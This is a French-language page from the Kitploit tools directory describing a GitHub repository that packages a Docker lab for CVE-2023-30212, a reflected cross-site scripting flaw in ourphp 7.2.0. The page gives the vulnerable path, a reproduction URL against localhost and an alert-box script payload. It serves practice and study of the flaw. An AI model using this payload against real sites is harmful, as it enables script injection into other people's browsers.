Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-30212-POC-DOCKER-FILE — Ce dépôt fournit un conteneur Docker pour simuler la vulnérabilité CVE-2023-30212, vous permettant de vous entraîner et de comprendre son impact. Il comprend un guide complet pour vous aider à configurer le conteneur sur votre propre ordinateur. La documentation du processus de création Docker est également incluse. | Kitploit
Outils/GitHubGitHub/rishipatidar/cve-2023-30212-poc-docker-file
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebApprentissage et ÉducationLabs et Pratique
GitHubrishipatidar/cve-2023-30212-poc-docker-file

CVE-2023-30212-POC-DOCKER-FILE

Voir le dépôt
111il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Ce dépôt fournit un conteneur Docker pour simuler la vulnérabilité CVE-2023-30212, vous permettant de vous entraîner et de comprendre son impact. Il comprend un guide complet pour vous aider à configurer le conteneur sur votre propre ordinateur. La documentation du processus de création Docker est également incluse.

Partager

CVE-2023-30212 POC : Cross-Site Scripting

via /client/manage/ourphp_out.php

Produits affectés par CVE-2023-30212 :

FournisseurProduitVersion
ourphpourphp7.2.0

Guide d'installation Docker :

Pour installer OURPHP <= 7.2.0 dans Docker, vous pouvez utiliser guide pour installer Docker à des fins de pratique.

Explication de la vulnérabilité :

root@kitploit:~
# ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
# In the file /client/manage/ourphp_out.php, there is a direct echo functionality that, along with controllable variables, can enable attackers to execute XSS code.When the ourphp_admin parameter is set to "logout," we echo a controllable variable called "out." 
# To exploit this, we prepend a script tag and close it, forming our payload.This vulnerability can be exploited through the "out" parameter by injecting the following script: "</script><script>alert(xss)</script>"

Étapes pour reproduire le problème :

root@kitploit:~
# After completing the setup of the docker directly. Access the following path :
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(`xss`)</script>

Payload pour la vulnérabilité :

root@kitploit:~
# </script><script>alert(`xss`)</script>

Vidéo

CVE-2023-30212

Références

  1. NIST
  2. cve.mitre.org
  3. Ourphp =>7.2.0 --> Code de référence
Télécharger l’outil